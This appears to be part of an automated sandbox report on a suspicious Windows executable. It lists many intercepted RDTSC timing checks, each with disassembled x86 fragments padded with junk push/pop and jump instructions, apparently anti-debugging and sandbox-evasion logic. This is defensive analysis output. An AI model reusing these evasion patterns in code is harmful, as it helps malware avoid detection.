                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C440 second address: 68C444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C444 second address: 68C44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C716 second address: 68C725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CA27 second address: 68CA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CBCD second address: 68CBEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7E2CD3B83Bh 0x0000000c jno 00007F7E2CD3B836h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CBEF second address: 68CC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CC83C96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F7E2CC83C96h 0x00000013 jmp 00007F7E2CC83CA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC18 second address: 68CC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC1C second address: 68CC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F7E2CC83C96h 0x00000010 jnp 00007F7E2CC83C96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC32 second address: 68CC55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F7E2CD3B836h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F7E2CD3B843h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEF0 second address: 68CF11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F7E2CC83CA9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D196 second address: 68D19D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D19D second address: 68D1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d jnc 00007F7E2CC83C96h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop ecx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D1CB second address: 68D1E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CD3B843h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A77D4 second address: 6A77F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A77F0 second address: 6A7830 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CD3B84Dh 0x00000008 jmp 00007F7E2CD3B847h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F7E2CD3B84Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A731C second address: 6A7320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7320 second address: 6A7326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABF0E second address: 6ABF18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0CEC second address: 6C0CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C10DD second address: 6C10F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7E2CC83C9Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C10F5 second address: 6C10F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C10F9 second address: 6C10FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1256 second address: 6C128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B846h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007F7E2CD3B836h 0x00000013 jmp 00007F7E2CD3B83Dh 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1609 second address: 6C160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C160F second address: 6C1613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1613 second address: 6C1617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1617 second address: 6C1628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1628 second address: 6C1666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CC83CA7h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jc 00007F7E2CC83CB3h 0x00000013 jmp 00007F7E2CC83CA7h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C17D9 second address: 6C17F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B843h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3AC2 second address: 6C3AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3AC7 second address: 6C3B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F7E2CD3B84Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F7E2CD3B836h 0x00000018 jmp 00007F7E2CD3B83Eh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3B04 second address: 6C3B14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F7E2CC83C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C7429 second address: 6C742F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA523 second address: 6CA53F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7E2CC83C9Eh 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F7E2CC83C96h 0x00000016 pop edi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2445 second address: 6D244D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D244D second address: 6D246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F7E2CC83C96h 0x0000000f jmp 00007F7E2CC83C9Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2289 second address: 6D228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D228F second address: 6D22A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F7E2CC83C9Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E16D4 second address: 6E16EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F7E2CD3B83Ch 0x0000000b js 00007F7E2CD3B83Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E16EF second address: 6E1708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 js 00007F7E2CC83C96h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 jc 00007F7E2CC83C98h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E1593 second address: 6E15A0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CD3B838h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E431E second address: 6E4336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4336 second address: 6E433A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E433A second address: 6E434E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7E2CC83CA2h 0x0000000c jnc 00007F7E2CC83C96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3E99 second address: 6E3EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7E2CD3B836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4009 second address: 6E400D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E400D second address: 6E4029 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7E2CD3B83Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6A5C second address: 6E6A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6A62 second address: 6E6A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 je 00007F7E2CD3B836h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6A71 second address: 6E6A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9654 second address: 6E9667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9667 second address: 6E967A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CC83C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECF79 second address: 6ECF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED0C6 second address: 6ED0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED0CA second address: 6ED119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7E2CD3B83Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7E2CD3B848h 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jc 00007F7E2CD3B836h 0x0000001b jng 00007F7E2CD3B836h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CD3B841h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED119 second address: 6ED11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED24C second address: 6ED289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7E2CD3B843h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 popad 0x00000013 jl 00007F7E2CD3B852h 0x00000019 jng 00007F7E2CD3B83Eh 0x0000001f pushad 0x00000020 popad 0x00000021 jg 00007F7E2CD3B836h 0x00000027 push eax 0x00000028 push edx 0x00000029 js 00007F7E2CD3B836h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED6BE second address: 6ED6C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDC7F second address: 6EDCB7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CD3B84Eh 0x00000008 jmp 00007F7E2CD3B846h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F7E2CD3B83Bh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007F7E2CD3B836h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCB7 second address: 6EDCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCBD second address: 6EDCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E2CD3B83Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCCF second address: 6EDCD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDCD5 second address: 6EDCDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F272D second address: 6F278A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb dx, 10C8h 0x0000000d push 00000004h 0x0000000f mov dx, BE48h 0x00000013 call 00007F7E2CC83C99h 0x00000018 jno 00007F7E2CC83CA0h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CC83CA5h 0x00000025 pop edx 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a jmp 00007F7E2CC83C9Dh 0x0000002f mov eax, dword ptr [eax] 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 pushad 0x00000035 popad 0x00000036 pop edi 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A64 second address: 6F2A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A6A second address: 6F2A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A6E second address: 6F2A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A72 second address: 6F2A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CC83C9Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A88 second address: 6F2A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2A9D second address: 6F2AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3F9A second address: 6F3FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7E2CD3B844h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F60B0 second address: 6F60B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C24 second address: 49F1C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C2A second address: 49F1C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C2E second address: 49F1C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b pushad 0x0000000c mov cx, 175Bh 0x00000010 popad 0x00000011 call dword ptr [7598188Ch] 0x00000017 mov edi, edi 0x00000019 push ebp 0x0000001a mov ebp, esp 0x0000001c push ecx 0x0000001d mov ecx, dword ptr [7FFE0004h] 0x00000023 mov dword ptr [ebp-04h], ecx 0x00000026 cmp ecx, 01000000h 0x0000002c jc 00007F7E2CD6D315h 0x00000032 mov eax, 7FFE0320h 0x00000037 mov eax, dword ptr [eax] 0x00000039 mul ecx 0x0000003b shrd eax, edx, 00000018h 0x0000003f mov esp, ebp 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007F7E2CD3B83Dh 0x00000048 pop ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C59 second address: 49F1C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C5D second address: 49F1C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C61 second address: 49F1C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1C67 second address: 49F1AE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B842h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007F7E31323B90h 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1AE0 second address: 49F1AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1AFD second address: 49F1BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7E2CD3B83Ch 0x00000011 and eax, 47EB2358h 0x00000017 jmp 00007F7E2CD3B83Bh 0x0000001c popfd 0x0000001d mov eax, 7CF1400Fh 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 mov si, di 0x00000028 pushad 0x00000029 mov si, di 0x0000002c pushfd 0x0000002d jmp 00007F7E2CD3B849h 0x00000032 or esi, 19C899A6h 0x00000038 jmp 00007F7E2CD3B841h 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 xchg eax, ebp 0x00000041 pushad 0x00000042 mov esi, 1904B373h 0x00000047 pushfd 0x00000048 jmp 00007F7E2CD3B848h 0x0000004d sub ecx, 51315278h 0x00000053 jmp 00007F7E2CD3B83Bh 0x00000058 popfd 0x00000059 popad 0x0000005a mov ebp, esp 0x0000005c pushad 0x0000005d movzx ecx, dx 0x00000060 popad 0x00000061 pop ebp 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BB7 second address: 49F1BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BBB second address: 49F1BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BC1 second address: 49F1BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83C9Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1969 second address: 49F196D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F196D second address: 49F1973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990798 second address: 49907BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 84h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CD3B849h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49907BC second address: 49907C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
